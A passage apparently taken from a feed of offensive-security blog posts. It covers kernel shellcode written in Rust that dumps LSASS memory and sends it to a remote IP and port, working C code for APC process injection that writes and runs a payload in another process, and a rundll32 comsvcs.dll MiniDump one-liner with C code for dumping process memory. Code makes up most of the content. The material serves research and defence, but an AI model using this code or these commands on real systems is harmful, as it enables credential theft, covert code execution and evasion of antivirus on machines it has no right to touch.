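 * Returns the number of bytes used, or 0 if `cap` is too small. */
size_t write_dump_prologue(uint8_t *out, size_t cap) {
    static const uint32_t streams[3] = {
        SystemInfoStream, ModuleListStream, Memory64ListStream
    };
    MINIDUMP_HEADER hdr;
    size_t need = sizeof(hdr) + 3 * sizeof(MINIDUMP_DIRECTORY);

    assert(out != NULL);
    if (cap < need) return 0;

    memset(&hdr, 0, sizeof(hdr));
    hdr.Signature          = MINIDUMP_SIGNATURE;
    hdr.Version            = MINIDUMP_VERSION;
    hdr.NumberOfStreams    = 3;
    hdr.StreamDirectoryRva = (uint32_t)sizeof(hdr);
    memcpy(out, &hdr, sizeof(hdr));

    for (size_t i = 0; i < 3; i++) {
        MINIDUMP_DIRECTORY dir = { streams[i], 0, 0 };
        memcpy(out + sizeof(hdr) + i * sizeof(dir), &dir, sizeof(dir));
    }
    return need;
}
```

    The prologue is 68 bytes: a 32-byte header followed by three 12-byte directory entries.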

    Obtaining Operating System Information

    Mimikatz really only needs to know the Major, Minor, and Build versions of NT. This can be obtained with the NTOSKRNL exported function RtlGetVersion() that provides the following struct:

    #[repr(C)]
    pub struct RTL_OSVERSIONINFOW {
        pub dwOSVersionInfoSize:        ULONG,
        pub dwMajorVersion:             ULONG,
        pub dwMinorVersion:             ULONG,
        pub dwBuildNumber:              ULONG,
        pub dwPlatformId:               ULONG,
        pub szCSDVersion:               [UINT16; 128],    
    }
    

    Scraping All Memory Regions

    Of course, the most important part of an LSASS dump is the actual memory of the LSASS process. Using KeStackAttachProcess() allows one to read the virtual memory of LSASS. From there it is possible to iterate over memory ranges with ZwQueryVirtualMemory().

    pub type ZwQueryVirtualMemory = extern "stdcall" fn(
        ProcessHandle:              HANDLE,
        BaseAddress:                PVOID,
        MemoryInformationClass:     MEMORY_INFORMATION_CLASS,
        MemoryInformation:          PVOID,
        MemoryInformationLength:    SIZE_T,
        ReturnLength:               PSIZE_T,
    ) -> crate::types::NTSTATUS;
    

    Pass in -1 for the ProcessHandle, 0 for the initial BaseAddress, and use the MemoryBasicInformation class to receive the following struct:

    #[repr(C)]
    pub struct MEMORY_BASIC_INFORMATION {
        pub BaseAddress:            PVOID,
        pub AllocationBase:         PVOID,
        pub AllocationProtect:      ULONG,
        pub PartitionId:            USHORT,
        pub RegionSize:             SIZE_T,
        pub State:                  ULONG,
        pub Protect:                ULONG,
        pub Type:                   ULONG,
    }
    

    For the next iteration of ZwQueryVirtualMemory(), just set the next BaseAddress to BaseAddress+RegionSize. Keep iterating until ReturnLength is 0 or there is an NT error.
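
    The iteration itself is a short loop. Here is a portable C sketch in which the query is a callback, so that a mock address space can stand in for ZwQueryVirtualMemory(); REGION_INFO, QUERY_FN, walk_regions and mock_query are illustrative names, and the zero-size guard is an extra safety check that the text does not mention.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Trimmed-down stand-in for MEMORY_BASIC_INFORMATION. */
typedef struct {
    uintptr_t BaseAddress;
    size_t    RegionSize;
} REGION_INFO;

/* Query callback: fills `out` for the region containing `addr` and returns
 * 0 on success, nonzero once `addr` is past the end of the address space. */
typedef int (*QUERY_FN)(uintptr_t addr, REGION_INFO *out);

/* Walk regions from address 0, storing up to `max` of them in `regions`. */
size_t walk_regions(QUERY_FN query, REGION_INFO *regions, size_t max) {
    uintptr_t addr = 0;
    size_t count = 0;
    REGION_INFO info;

    assert(query != NULL && regions != NULL);
    while (count < max && query(addr, &info) == 0) {
        if (info.RegionSize == 0) break;            /* avoid looping forever */
        regions[count++] = info;
        addr = info.BaseAddress + info.RegionSize;  /* next region starts here */
    }
    return count;
}

/* Mock address space with three back-to-back regions, for off-target runs. */
static const REGION_INFO g_mock[] = {
    { 0x00000, 0x10000 }, { 0x10000, 0x3000 }, { 0x13000, 0x1000 }
};

int mock_query(uintptr_t addr, REGION_INFO *out) {
    for (size_t i = 0; i < sizeof(g_mock) / sizeof(g_mock[0]); i++) {
        if (addr >= g_mock[i].BaseAddress &&
            addr < g_mock[i].BaseAddress + g_mock[i].RegionSize) {
            *out = g_mock[i];
            return 0;
        }
    }
    return -1;
}
```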

    Collecting List of Loaded Modules

    Mimikatz also needs to know where a few of the DLLs are located in memory in order to scrape some secrets out of them during processing.

    The most convenient way to iterate these is to grab the DLL list out of the PEB. The PEB can be found using ZwQueryInformationProcess() with the ProcessBasicInformation class.

    Mimikatz requires the DLL name, address, and size. These are easily scraped out of PEB->Ldr->InLoadOrderModuleList, which is a well-documented methodology to obtain the linked list of LDR_DATA_TABLE_ENTRY entries.

    #[cfg(target_arch="x86_64")]
    #[repr(C, packed)]
    pub struct LDR_DATA_TABLE_ENTRY {
        pub InLoadOrderLinks:               LIST_ENTRY,
        pub InMemoryOrderLinks:             LIST_ENTRY,
        pub InInitializationOrderLinks:     LIST_ENTRY,
        pub DllBase:                        PVOID,
        pub EntryPoint:                     PVOID,
        pub SizeOfImage:                    ULONG,
        pub Padding_0x44_0x48:              [BYTE; 4],
        pub FullDllName:                    UNICODE_STRING,
        pub BaseDllName:                    UNICODE_STRING,
        /* ...etc... */
    }
    

    Just iterate the linked list til you wind back at the beginning, grabbing FullDllName, DllBase, and SizeOfImage of each DLL for the dump file.
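
    A minimal C sketch of that walk follows, using a reduced mock of the loader entry. MOCK_LDR_ENTRY and collect_modules are hypothetical names, and the DLL name is a plain C string here rather than a UNICODE_STRING. Since InLoadOrderLinks is the first member, a list pointer can be cast straight to an entry pointer.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef struct LIST_ENTRY {
    struct LIST_ENTRY *Flink;
    struct LIST_ENTRY *Blink;
} LIST_ENTRY;

/* Reduced stand-in for LDR_DATA_TABLE_ENTRY: only the fields the dump needs. */
typedef struct {
    LIST_ENTRY  InLoadOrderLinks;  /* first member: list ptr == entry ptr */
    uintptr_t   DllBase;
    uint32_t    SizeOfImage;
    const char *FullDllName;
} MOCK_LDR_ENTRY;

/* Visit every module once: start after the list head and stop when the walk
 * arrives back at it. Returns how many entries were stored in `out`. */
size_t collect_modules(const LIST_ENTRY *head,
                       const MOCK_LDR_ENTRY **out, size_t max) {
    size_t n = 0;

    assert(head != NULL && out != NULL);
    for (const LIST_ENTRY *e = head->Flink; e != head && n < max; e = e->Flink)
        out[n++] = (const MOCK_LDR_ENTRY *)e;
    return n;
}
```

    The list head itself is not a module, which is why the loop starts at head->Flink and ends as soon as it reaches head again.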

    Notes on Shellcoding in Rust

    Rust is one of the more modern languages trending these days. It does not require a run-time and can be used to write extremely low-level embedded code that interacts with C FFI. To my knowledge there are only a few things that C/C++ can do that Rust cannot: C variadic functions (coming soon) and SEH (outside of internal panic operations?).

    It is simple enough to cross-compile Rust from Linux using the mingw-w64 linker, and use Rustup to add the x86_64-pc-windows-gnu target. I create a DLL project and extract the code between _DllMainCRTStartup() and malloc(). Not very stable perhaps, but I could only figure out how to generate PE files and not something such as a COM file.

    Here's an example of how nice shellcoding in Rust can be:

    let mut socket = nttdi::TdiSocket::new(tdi_ctx);
    
    socket.add_recv_handler(recv_handler);
    socket.connect(0xdd01a8c0, 0xBCFB)?;  // 192.168.1.221:64444
    
    socket.send("abc".as_bytes().as_ptr(), 3)?;
    

    Compiler Optimizations

    Rust sits atop LLVM, which optimizes an intermediate representation before final code generation, and thus benefits from many of the optimizations that languages such as C++ (Clang) have received over the years.

    I won't get too deep into the weeds, especially with zealots on all sides, but the highly static compilation nature of Rust often results in much smaller code size than C or C++. Code size is not necessarily an indicator of performance, but for shellcode it is important. You can do your own testing, but Rust's code generation is extremely good.

    We can set the Cargo.toml file to use opt-level='z' (optimize for size) and lto=true (link-time optimization) to further reduce generated code size.
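
    In Cargo.toml these two settings live under a profile section. The fragment below is a minimal sketch that assumes the shellcode is built with the release profile; the post does not say which profile the project actually uses.

```toml
[profile.release]
opt-level = "z"   # optimize for size
lto = true        # link-time optimization across crates
```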

    Using High-Level Constructs

    The most obvious high-level benefit of using Rust is RAII. In Windows this means HANDLEs can be automatically closed, kernel pools automatically freed, etc. when our encapsulating objects go out of scope. Simple constructors and destructors such as these examples are aggressively inlined with our Rust compiler flags.

    Rust has concepts such as "Result<Ok, Err>" return types, as well as the ? 'unwrap or throw' operator, which allows us to bubble up errors in a streamlined fashion. We can return tuples in the Ok slot, and NTSTATUS codes in the Err slot if something goes wrong. The code generation for this feature is minimal, often returning a double wide struct. The bookkeeping is basically equivalent to the amount of bytes it would take to do by hand, but simplifies the high level code considerably.

    For shellcoding purposes, we cannot use the "std" library (to digress, well, we could add an allocator), and must use Rust "core" only. Further, many open-source crate libraries are off-limits due to causing the code to not be position independent. For this reason, a new crate called `ntdef` was created, which simply contains only definitions of types and 0 static-positioned information. Oh, and if you ever need stack-based wide-strings (perhaps something else missing from C), check out JennaMagius' stacklstr crate.

    Due to the low-level nature of the code, its FFI interactions with the kernel, and having to carry around context pointers, most of the shellcode is "unsafe" Rust code.

    Writing shellcode by hand is tedious and results in long debug sessions. The ability to write the assembly template in a high-level abstraction language like Rust saves enormous amounts of time in research and development. Handcrafted assembly will always result in smaller code size, but having a guide to go off of is of great benefit. After all, optimizing compilers are written by humans, and all edge cases are not taken into account.

    Conclusion

    SassyKitdi must be performed at PASSIVE_LEVEL. To use the sample project in an exploit payload, you will need to provide your own exploit preamble. This is the unique part of the exploit that cleans up the stack frame, and in e.g. EternalBlue lowers the IRQL from DISPATCH_LEVEL.

    What is interesting to consider is turning the use of a TDI exploit payload into the staging for a kernel-mode, Meterpreter-like framework. It is very easy to tweak the provided code to instead download and execute a larger secondary kernel-mode payload. This can take the form of a reflectively-loaded driver. Such a framework would have easy access to tokens, files, and many other functionalities that are currently getting caught by AV in user-mode. This initial staging shellcode can be hand-shrunk to approximately 1000-1500 bytes.

    Windows Process Injection: Asynchronous Procedure Call (APC)

    By: odzhan
    27 August 2019 at 18:00

    Introduction

    An early example of APC injection can be found in a 2005 paper by the late Barnaby Jack called Remote Windows Kernel Exploitation – Step into the Ring 0. Until now, these posts have focused on relatively new, lesser-known injection techniques. A factor in not covering APC injection before is the lack of a single user-mode API to identify alertable threads. Many have asked “how to identify an alertable thread” and were given an answer that didn’t work or were told it’s not possible. This post will examine two methods that both use a combination of user-mode API to identify them. The first was described in 2016 and the second was suggested earlier this month at Blackhat and Defcon.

    Alertable Threads

    A number of Windows APIs and their underlying system calls support asynchronous operations, specifically I/O completion routines. A boolean parameter tells the kernel that the calling thread should be alertable, so I/O completion routines for overlapped operations can still run in the background while waiting for some other event to become signalled. Completion routines or callback functions are placed in the APC queue and executed by the kernel via NTDLL!KiUserApcDispatcher. The following Win32 APIs can set threads to alertable.

    A few others that are rarely mentioned involve working with files or named pipes that might be read or written to using overlapped operations, e.g. ReadFile.

    Unfortunately, there’s no single user-mode API to determine if a thread is alertable. From the kernel, the KTHREAD structure has an Alertable bit, but from user-mode there’s nothing similar, at least not that I’m aware of.

    Method 1

    This method was first described and used by Tal Liberman in a technique he invented called AtomBombing.

    …create an event for each thread in the target process, then ask each thread to set its corresponding event. … wait on the event handles, until one is triggered. The thread whose corresponding event was triggered is an alertable thread.

    Based on this description, we take the following steps:

    1. Enumerate threads in a target process using Thread32First and Thread32Next. OpenThread and save the handle to an array not exceeding MAXIMUM_WAIT_OBJECTS.
    2. CreateEvent for each thread and DuplicateHandle for the target process.
    3. QueueUserAPC for each thread that will execute SetEvent on the handle duplicated in step 2.
    4. WaitForMultipleObjects until one of the event handles becomes signalled.
    5. The first event signalled is from an alertable thread.

    MAXIMUM_WAIT_OBJECTS is defined as 64 which might seem like a limitation, but how likely is it for processes to have more than 64 threads and not one alertable?

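    #include <windows.h>
    #include <tlhelp32.h>
    
    // Returns a handle to an alertable thread in process pid, or NULL.
    // hp is a handle to the same process, opened with PROCESS_DUP_HANDLE.
    HANDLE find_alertable_thread1(HANDLE hp, DWORD pid) {
        DWORD         i, cnt = 0;
        HANDLE        ss, ht, h = NULL, 
          hl[MAXIMUM_WAIT_OBJECTS],
          sh[MAXIMUM_WAIT_OBJECTS],
          th[MAXIMUM_WAIT_OBJECTS];
        THREADENTRY32 te;
        HMODULE       m;
        LPVOID        f;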
        
        // 1. Enumerate threads in target process
        ss = CreateToolhelp32Snapshot(
          TH32CS_SNAPTHREAD, 0);
          
        if(ss == INVALID_HANDLE_VALUE) return NULL;
    
        te.dwSize = sizeof(THREADENTRY32);
        
        if(Thread32First(ss, &te)) {
          do {
            // if not our target process, skip it
            if(te.th32OwnerProcessID != pid) continue;
            // if we can't open thread, skip it
            ht = OpenThread(
              THREAD_ALL_ACCESS, 
              FALSE, 
              te.th32ThreadID);
              
            if(ht == NULL) continue;
            // otherwise, add to list
            hl[cnt++] = ht;
            // if we've reached MAXIMUM_WAIT_OBJECTS. break
            if(cnt == MAXIMUM_WAIT_OBJECTS) break;
          } while(Thread32Next(ss, &te));
        }
    
        // Resolve address of SetEvent
        m  = GetModuleHandleW(L"kernel32.dll");
        f  = GetProcAddress(m, "SetEvent");
        
        for(i=0; i<cnt; i++) {
          // 2. create event and duplicate in target process
          sh[i] = CreateEvent(NULL, FALSE, FALSE, NULL);
          
          DuplicateHandle(
            GetCurrentProcess(),  // source process
            sh[i],                // source handle to duplicate
            hp,                   // target process
            &th[i],               // target handle
            0, 
            FALSE, 
            DUPLICATE_SAME_ACCESS);
            
          // 3. Queue APC for thread passing target event handle
          QueueUserAPC(f, hl[i], (ULONG_PTR)th[i]);
        }
    
        // 4. Wait for event to become signalled
        i = WaitForMultipleObjects(cnt, sh, FALSE, 1000);
        if(i != WAIT_TIMEOUT) {
          // 5. save thread handle
          h = hl[i];
        }
        
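        // 6. Close source + target handles
        for(i=0; i<cnt; i++) {
          CloseHandle(sh[i]);
          // th[i] is only valid in the target process, so close it there
          DuplicateHandle(hp, th[i], NULL, NULL, 
            0, FALSE, DUPLICATE_CLOSE_SOURCE);
          if(hl[i] != h) CloseHandle(hl[i]);
        }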
        CloseHandle(ss);
        return h;
    }
    

    Method 2

    At Blackhat and Defcon 2019, Itzik Kotler and Amit Klein presented Process Injection Techniques – Gotta Catch Them All. They suggested alertable threads can be detected by simply reading the context of a remote thread and examining the control and integer registers. There’s currently no code in their pinjectra tool to perform this, so I decided to investigate how it might be implemented in practice.

    If you look at the disassembly of KERNELBASE!SleepEx on Windows 10 (shown in figure 1), you can see it invokes the NT system call, NTDLL!ZwDelayExecution.

    Figure 1. Disassembly of SleepEx on Windows 10.

    The system call wrapper (shown in figure 2) executes a syscall instruction which transfers control from user-mode to kernel-mode. If we read the context of a thread that called KERNELBASE!SleepEx, the program counter (Rip on AMD64) should point to NTDLL!ZwDelayExecution + 0x14 which is the address of the RETN opcode.

    Figure 2. Disassembly of NTDLL!ZwDelayExecution on Windows 10.

    This address can be used to determine if a thread has called KERNELBASE!SleepEx. There are two ways to calculate it: add a hardcoded offset to the address returned by GetProcAddress for NTDLL!ZwDelayExecution, or read the program counter after calling KERNELBASE!SleepEx from a thread we create ourselves.

    For the second option, a simple application was written to run a thread that calls each alertable wait API with the alertable parameter set to TRUE. In between each invocation, GetThreadContext is used to read the program counter (Rip on AMD64), which will hold the return address after the system call has completed. This address can then be used in the first step of detection. Figure 3 shows the output of this.

    Figure 3. Win32 API and NT System Call Wrappers.

    The following table matches Win32 APIs with NT system call wrappers. The parameters are included for reference.

    Win32 API                                           NT System Call
    SleepEx                                             ZwDelayExecution(BOOLEAN Alertable, PLARGE_INTEGER DelayInterval);
    WaitForSingleObjectEx, GetOverlappedResultEx        ZwWaitForSingleObject(HANDLE Handle, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
    WaitForMultipleObjectsEx, WSAWaitForMultipleEvents  NtWaitForMultipleObjects(ULONG ObjectCount, PHANDLE ObjectsArray, OBJECT_WAIT_TYPE WaitType, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
    SignalObjectAndWait                                 NtSignalAndWaitForSingleObject(HANDLE SignalHandle, HANDLE WaitHandle, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
    MsgWaitForMultipleObjectsEx                         NtUserMsgWaitForMultipleObjectsEx(ULONG ObjectCount, PHANDLE ObjectsArray, DWORD Timeout, DWORD WakeMask, DWORD Flags);
    GetQueuedCompletionStatusEx                         NtRemoveIoCompletionEx(HANDLE Port, FILE_IO_COMPLETION_INFORMATION *Info, ULONG Count, ULONG *Written, LARGE_INTEGER *Timeout, BOOLEAN Alertable);

    The second step of detection involves reading the register or stack slot that holds the Alertable parameter. NT system calls use the Microsoft fastcall convention. The first four arguments are placed in RCX, RDX, R8 and R9 with the remainder stored on the stack. Figure 4 shows the Win64 stack layout. The first slot at the stack pointer (Rsp) contains the return address of the caller. The next four are the shadow space (also called spill or home space), where the callee may optionally save RCX, RDX, R8 and R9. The fifth, sixth and subsequent arguments to the system call appear after this.

    Figure 4. Win64 Stack Layout.
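
    As a rough sketch of the layout described above, the following portable C maps each system call in the table to the position of its Alertable (or flags) argument and shows where that argument sits on entry. The table and helper names (alertable_args, alertable_position, win64_arg_register, win64_arg_stack_offset) are illustrative and not part of the PoC. The position used for NtWaitForMultipleObjects assumes Alertable is its fourth argument, which matches the R9 discussion in this post.

```c
#include <stddef.h>
#include <string.h>

/* 1-based position of the Alertable (or flags) argument per system call.
 * Illustrative table derived from the prototypes listed in the post. */
struct alertable_arg {
    const char *syscall;
    unsigned    position;
};

static const struct alertable_arg alertable_args[] = {
    { "ZwDelayExecution",                  1 },
    { "ZwWaitForSingleObject",             2 },
    { "NtWaitForMultipleObjects",          4 },  /* assumed: 4th argument */
    { "NtSignalAndWaitForSingleObject",    3 },
    { "NtUserMsgWaitForMultipleObjectsEx", 5 },  /* Flags, MWMO_ALERTABLE */
    { "NtRemoveIoCompletionEx",            6 },
};

/* Look up the argument position; returns 0 if the name is unknown. */
static unsigned alertable_position(const char *syscall) {
    size_t n = sizeof(alertable_args) / sizeof(alertable_args[0]);
    for (size_t i = 0; i < n; i++) {
        if (strcmp(alertable_args[i].syscall, syscall) == 0)
            return alertable_args[i].position;
    }
    return 0;
}

/* Register carrying argument n on entry, or NULL if it is on the stack. */
static const char *win64_arg_register(unsigned n) {
    static const char *regs[] = { "RCX", "RDX", "R8", "R9" };
    return (n >= 1 && n <= 4) ? regs[n - 1] : NULL;
}

/* Byte offset from Rsp of argument n: slot 0 is the return address and
 * slots 1-4 are the home space, so argument n sits in 8-byte slot n. */
static size_t win64_arg_stack_offset(unsigned n) {
    return (size_t)n * 8;
}
```

    For example, win64_arg_stack_offset(5) gives 0x28, which is slot p[5] of the array that IsAlertable reads from Rsp. The home-space slots for arguments one to four are only meaningful if the callee chose to spill them there.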

    Based on the prototypes shown in the above table, a thread is alertable if its program counter matches one of the saved addresses and the register or stack slot holding the Alertable parameter is TRUE. The following code performs this check.

    BOOL IsAlertable(HANDLE hp, HANDLE ht, LPVOID addr[6]) {
        CONTEXT   c;
        BOOL      alertable = FALSE;
        DWORD     i;
        ULONG_PTR p[8];
        SIZE_T    rd;
        
        // read the context; give up if it can't be read
        c.ContextFlags = CONTEXT_INTEGER | CONTEXT_CONTROL;
        if(!GetThreadContext(ht, &c)) return FALSE;
        
        // for each alertable function
        for(i=0; i<6 && !alertable; i++) {
          // compare address with program counter
          if((LPVOID)c.Rip == addr[i]) {
            switch(i) {
              // ZwDelayExecution
              case 0 : {
                alertable = (c.Rcx & TRUE);
                break;
              }
              // NtWaitForSingleObject
              case 1 : {
                alertable = (c.Rdx & TRUE);
                break;
              }
              // NtWaitForMultipleObjects
              case 2 : {
                alertable = (c.Rsi & TRUE);
                break;
              }
              // NtSignalAndWaitForSingleObject
              case 3 : {
                alertable = (c.Rsi & TRUE);
                break;
              }
              // NtUserMsgWaitForMultipleObjectsEx
              case 4 : {
                // fifth argument (Flags) is on the stack at Rsp + 0x28
                if(ReadProcessMemory(hp, (LPVOID)c.Rsp, p, sizeof(p), &rd))
                  alertable = (p[5] & MWMO_ALERTABLE) != 0;
                break;
              }
              // NtRemoveIoCompletionEx
              case 5 : {
                // sixth argument (Alertable) is on the stack at Rsp + 0x30
                if(ReadProcessMemory(hp, (LPVOID)c.Rsp, p, sizeof(p), &rd))
                  alertable = (p[6] & TRUE);
                break;
              }
            }
          }
        }
        return alertable;
    }
    

    You might be asking why Rsi is checked for two of the calls despite not being used for a parameter by the Microsoft fastcall convention. This is a callee saved non-volatile register that should be preserved by any function that uses it. RCX, RDX, R8 and R9 are volatile registers and don’t need to be preserved. It just so happens the kernel overwrites R9 for NtWaitForMultipleObjects (shown in figure 5) and R8 for NtSignalAndWaitForSingleObject (shown in figure 6) hence the reason for checking Rsi instead. BOOLEAN is defined as an 8-bit type, so a mask of the register is performed before comparing with TRUE or FALSE.

    Figure 5. Rsi used for Alertable Parameter to NtWaitForMultipleObjects.

    Figure 6. Rsi used for Alertable parameter to NtSignalAndWaitForSingleObject.
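
    To illustrate why the mask matters, here is a small portable sketch (the helper names are mine, not from the PoC). A BOOLEAN occupies only the low byte of a 64-bit register, so the upper bits may hold leftovers from earlier computations and have to be ignored.

```c
#include <stdint.h>

/* Interpret a 64-bit register as an 8-bit BOOLEAN argument: only the
 * low byte is meaningful, bits 8-63 may contain stale data. */
static int reg_as_boolean(uint64_t reg) {
    return (uint8_t)reg != 0;
}

/* The stricter test used in the post (reg & TRUE): only bit 0 counts. */
static int reg_low_bit(uint64_t reg) {
    return (int)(reg & 1);
}
```

    IsAlertable masks with TRUE, which corresponds to reg_low_bit. reg_as_boolean is a looser variant that treats any non-zero low byte as true.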

    The following code can support adding an offset or reading the thread context before enumerating threads.

    // thread to run alertable functions
    DWORD WINAPI ThreadProc(LPVOID lpParameter) {
        HANDLE           *evt = (HANDLE*)lpParameter;
        HANDLE           port;
        OVERLAPPED_ENTRY lap;
        DWORD            n;
        
        SleepEx(INFINITE, TRUE);
        
        WaitForSingleObjectEx(evt[0], INFINITE, TRUE);
        
        WaitForMultipleObjectsEx(2, evt, FALSE, INFINITE, TRUE);
        
        SignalObjectAndWait(evt[1], evt[0], INFINITE, TRUE);
        
        ResetEvent(evt[0]);
        ResetEvent(evt[1]);
        
        MsgWaitForMultipleObjectsEx(2, evt, 
          INFINITE, QS_RAWINPUT, MWMO_ALERTABLE);
          
        port = CreateIoCompletionPort(INVALID_HANDLE_VALUE, NULL, 0, 0);
        GetQueuedCompletionStatusEx(port, &lap, 1, &n, INFINITE, TRUE);
        CloseHandle(port);
        
        return 0;
    }
    
    HANDLE find_alertable_thread2(HANDLE hp, DWORD pid) {
        HANDLE        ss, ht, evt[2], h = NULL;
        LPVOID        rm, sevt, f[6];
        THREADENTRY32 te;
        SIZE_T        rd;
        DWORD         i;
        CONTEXT       c;
        ULONG_PTR     p;
        HMODULE       m;
        
        // using the offset requires less code but it may
        // not work across all systems.
    #ifdef USE_OFFSET
        char *api[6]={
          "ZwDelayExecution", 
          "ZwWaitForSingleObject",
          "NtWaitForMultipleObjects",
          "NtSignalAndWaitForSingleObject",
          "NtUserMsgWaitForMultipleObjectsEx",
          "NtRemoveIoCompletionEx"};
          
        // 1. Resolve address of alertable functions
        for(i=0; i<6; i++) {
          m = GetModuleHandle(i == 4 ? L"win32u" : L"ntdll");
          f[i] = (LPBYTE)GetProcAddress(m, api[i]) + 0x14;
        }
    #else
        // create thread to execute alertable functions
        evt[0] = CreateEvent(NULL, FALSE, FALSE, NULL);
        evt[1] = CreateEvent(NULL, FALSE, FALSE, NULL);
        ht     = CreateThread(NULL, 0, ThreadProc, evt, 0, NULL);
        
        // wait a moment for thread to initialize
        Sleep(100);
        
        // resolve address of SetEvent
        m      = GetModuleHandle(L"kernel32.dll");
        sevt   = GetProcAddress(m, "SetEvent");
        
        // for each alertable function
        for(i=0; i<6; i++) {
          // read the thread context
          c.ContextFlags = CONTEXT_CONTROL;
          GetThreadContext(ht, &c);
          // save address
          f[i] = (LPVOID)c.Rip;
          // queue SetEvent for next function
          QueueUserAPC(sevt, ht, (ULONG_PTR)evt);
          // give the thread time to run the APC and block
          // in the next alertable call before sampling again
          Sleep(100);
        }
        // cleanup thread
        CloseHandle(ht);
        CloseHandle(evt[0]);
        CloseHandle(evt[1]);
    #endif
    
        // Create a snapshot of threads
        ss = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
        if(ss == INVALID_HANDLE_VALUE) return NULL;
        
        // check each thread
        te.dwSize = sizeof(THREADENTRY32);
        
        if(Thread32First(ss, &te)) {
          do {
            // if not our target process, skip it
            if(te.th32OwnerProcessID != pid) continue;
            
            // if we can't open thread, skip it
            ht = OpenThread(
              THREAD_ALL_ACCESS, 
              FALSE, 
              te.th32ThreadID);
              
            if(ht == NULL) continue;
            
            // found alertable thread?
            if(IsAlertable(hp, ht, f)) {
              // save handle and exit loop
              h = ht;
              break;
            }
            // else close it and continue
            CloseHandle(ht);
          } while(Thread32Next(ss, &te));
        }
        // close snap shot
        CloseHandle(ss);
        return h;
    }
    

    Conclusion

    Although both methods work fine, the first has some advantages because the second depends on details that vary. Different CPU modes/architectures (x86, AMD64, ARM64) and calling conventions (__msfastcall/__stdcall) require different ways to examine parameters. Microsoft may change how the system call wrapper functions work, in which case hardcoded offsets may point to the wrong address. Future builds may also be compiled to hold the alertable parameter in another non-volatile register, e.g. RBX, RDI or RBP.

    Injection

    After the difficult part of detecting alertable threads, the rest is fairly straightforward. The two main functions used for APC injection are:

    • QueueUserAPC
    • NtQueueApcThread

    The second is undocumented and therefore used by some threat actors to bypass API monitoring tools. Since KiUserApcDispatcher is used for APC routines, one might consider invoking it instead. The prototypes are:

    NTSTATUS NtQueueApcThread(
      IN  HANDLE ThreadHandle,
      IN  PVOID ApcRoutine,
      IN  PVOID ApcRoutineContext OPTIONAL,
      IN  PVOID ApcStatusBlock OPTIONAL,
      IN  ULONG ApcReserved OPTIONAL);
    
    VOID KiUserApcDispatcher(
      IN  PCONTEXT Context,
      IN  PVOID ApcContext,
      IN  PVOID Argument1,
      IN  PVOID Argument2,
      IN  PKNORMAL_ROUTINE ApcRoutine);
    

    For this post, only QueueUserAPC is used.

    VOID apc_inject(DWORD pid, LPVOID payload, DWORD payloadSize) {
        HANDLE hp, ht;
        SIZE_T wr;
        LPVOID cs;
        
        // 1. Open target process
        hp = OpenProcess(
          PROCESS_DUP_HANDLE | 
          PROCESS_VM_READ    | 
          PROCESS_VM_WRITE   | 
          PROCESS_VM_OPERATION, 
          FALSE, pid);
          
        if(hp == NULL) return;
        
        // 2. Find an alertable thread
        ht = find_alertable_thread1(hp, pid);
    
        if(ht != NULL) {
          // 3. Allocate memory
          cs = VirtualAllocEx(
            hp, 
            NULL, 
            payloadSize, 
            MEM_COMMIT | MEM_RESERVE, 
            PAGE_EXECUTE_READWRITE);
            
          if(cs != NULL) {
            // 4. Write code to memory
            if(WriteProcessMemory(
              hp, 
              cs, 
              payload, 
              payloadSize, 
              &wr)) 
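            {
              // 5. Run code. The APC only fires once the thread
              //    enters an alertable wait, so the payload memory
              //    must remain allocated after this call.
              QueueUserAPC((PAPCFUNC)cs, ht, 0);
            } else {
              printf("unable to write payload to process.\n");
              // 6. Free memory only when nothing was queued.
              //    MEM_RELEASE must not be combined with MEM_DECOMMIT.
              VirtualFreeEx(hp, cs, 0, MEM_RELEASE);
            }
          } else {
            printf("unable to allocate memory.\n");
          }
          // close the thread handle returned by the search
          CloseHandle(ht);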
        } else {
          printf("unable to find alertable thread.\n");
        }
        // 7. Close process
        CloseHandle(hp);
    }
    

    PoC here

    odzhan

    MiniDumpWriteDump via COM+ Services DLL

    By: odzhan
    30 August 2019 at 10:42

    Introduction

    This will be a very quick code-oriented post about a DLL function exported by comsvcs.dll that I was unable to find any reference to online.

    UPDATE: Memory Dump Analysis Anthology Volume 1 that was published in 2008 by Dmitry Vostokov, discusses this function in a chapter on COM+ Crash Dumps. The reason I didn’t find it before is because I was searching for “MiniDumpW” and not “MiniDump”.

    While searching for DLL/EXE that imported DBGHELP!MiniDumpWriteDump, I discovered comsvcs.dll exports a function called MiniDumpW which appears to have been designed specifically for use by rundll32. It will accept three parameters but the first two are ignored. The third parameter should be a UNICODE string combining three tokens/parameters wrapped in quotation marks. The first is the process id, the second is where to save the memory dump and third requires the keyword “full” even though there’s no alternative for this last parameter.

    To use from the command line, type the following, where “1234” is the id of the target process to dump: rundll32 C:\windows\system32\comsvcs.dll MiniDump "1234 dump.bin full". Obviously, this assumes you have permission to query and read the memory of the target process. If COMSVCS!MiniDumpW encounters an error, it simply calls KERNEL32!ExitProcess and you won’t see anything. The following code in C demonstrates how to invoke it dynamically.

    BTW, HRESULT is probably the wrong return type. Internally it exits the process with E_INVALIDARG if it encounters a problem with the parameters, but if it succeeds, it returns 1. S_OK is defined as 0.

    #define UNICODE
    #include <windows.h>
    #include <stdio.h>
    
    typedef HRESULT (WINAPI *_MiniDumpW)(
      DWORD arg1, DWORD arg2, PWCHAR cmdline);
      
    typedef NTSTATUS (WINAPI *_RtlAdjustPrivilege)(
      ULONG Privilege, BOOL Enable, 
      BOOL CurrentThread, PULONG Enabled);
    
    // "<pid> <dump.bin> full"
    int wmain(int argc, wchar_t *argv[]) {
        HRESULT             hr;
        _MiniDumpW          MiniDumpW;
        _RtlAdjustPrivilege RtlAdjustPrivilege;
        ULONG               t;
        
        MiniDumpW          = (_MiniDumpW)GetProcAddress(
          LoadLibrary(L"comsvcs.dll"), "MiniDumpW");
          
        RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(
          GetModuleHandle(L"ntdll"), "RtlAdjustPrivilege");
        
        if(argc != 2) {
          printf("usage: %ws \"<pid> <dump.bin> full\"\n", argv[0]);
          return 0;
        }
        
        if(MiniDumpW == NULL) {
          printf("Unable to resolve COMSVCS!MiniDumpW.\n");
          return 0;
        }
        // try enable debug privilege
        RtlAdjustPrivilege(20, TRUE, FALSE, &t);
            
